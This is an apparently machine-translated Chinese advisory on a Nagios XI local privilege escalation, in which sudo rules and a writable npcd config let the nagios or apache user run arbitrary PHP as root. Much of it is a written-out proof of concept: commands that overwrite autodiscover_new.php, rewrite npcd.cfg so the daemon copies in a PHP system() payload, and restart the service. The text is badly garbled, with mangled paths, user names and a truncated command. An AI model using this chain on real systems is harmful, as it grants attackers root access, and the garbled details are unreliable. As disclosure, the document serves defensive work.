/usr/local/nagiosxi/scrips/autodise_new.ph低特权用户可用sudo执行自发现-new.phaches)-最终允许执行带root特权的任意PHP代码
aches用户使用sudo使用自定义发现新.php文件
用户_Alias NaGIOSXI=nagios用户_Alias NaGIOSXIWEB=acheNAGIOSXIALL=NOPASWD:/usr/bin/php/usr/local/nagiosxi/scripts/NAGIOSXIWEBALL=NOPASWD:/usr/bin/php/usr/local/nagiosxi/scripts/
表示nagios和ache用户可用root权限执行此文件Nagios用户还可以利用它修改root所有文件权限允许写访问Nagios用户因此能覆盖自发现新.php文件并修改权限允许写访问允许nagios用户编辑自发现新.ph
并用npcd服务运行nagios用户,但ache用户也可以写入可修改配置文件发布自定义二进制参数
saux+grepncdnagios10290.0371248100414点14分/usr/local/nagios/bin/npcd-f/usr/local/nagios/etc/pnp/npcd.cfg#Is-l/usr/local/nagios/etc/pncd.cfg-rw-rw-raches 3090s313:02/usr/local/nagios/etc/pn/npcd.cfg
ache用户使用sr/local/nagiosxi/scrips/manage_services.sh管理ncd服务
用户_Alias NaGIOSXI=nagios用户_Alias NaGIOSXIWEB=acheNAGIOSXIWEBALL=NOPASWD:/usr/local/nagiosxi/scrips/manage_services.sh*
归根结底,ache用户有权限修改npcd发射配置,使自发现-new.ph并使用sudo高端权限执行本地特权升级可与网络脆弱性并用
概念证明
注意:POC将阻塞/usr/local/nagiosxi/script/构件/自定义发现新.phasnagios或ache用户(通过Web开发)运行下列命令:
#覆盖自发现新.phthis will also modify its permissions to be writable by nagios # will take a moment to complete sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1 --output=/usr/local/nagiosxi/scripts/components/autodiscover_new.php # stop npcd service sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd # write to config file # note the use of curl to copy the file's contents to the vulnerable autodiscover_new.php echo -e "user = nagios\ngroup = nagios\nlog_type = file\nlog_file = /usr/local/nagios/var/npcd.log\nmax_logfile_size = 10485760\nlog_level = 0\nperfdata_spool_dir = /usr/local/nagiosxi/scripts/components/\nperfdata_file_run_cmd = /usr/bin/curl\nperfdata_file_run_cmd_args = file:///usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/autodiscover_new.php -o /usr/local/nagiosxi/scripts/components/autodiscover_new.php\nnpcd_max_threads = 5\nsleep_time = 15\nload_threshold = 10.0\npid_file=/usr/local/nagiosxi/var/subsys/npcd.pid\n\n# scrappy" > /usr/local/nagios/etc/pnp/npcd.cfg # write new autodiscover_new.php file # note that this is a different autodiscover_new.php than the script containing the vuln # this file's contents are copied once npcd launches echo -e "\x3c\x3fphp system('whoami')!\x3f\x3e" > /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/autodiscover_new.php # start service.s startncd#启动sudo/usr/bin/php/usr/
下图屏幕显示PHP文件内运行 PoCPOC模拟网络环境执行即链式开发的一部分)调用whoami预示显示代码初始运行为ache
通知端输出包含'root'表示自发现新.php脚本使用root权限执行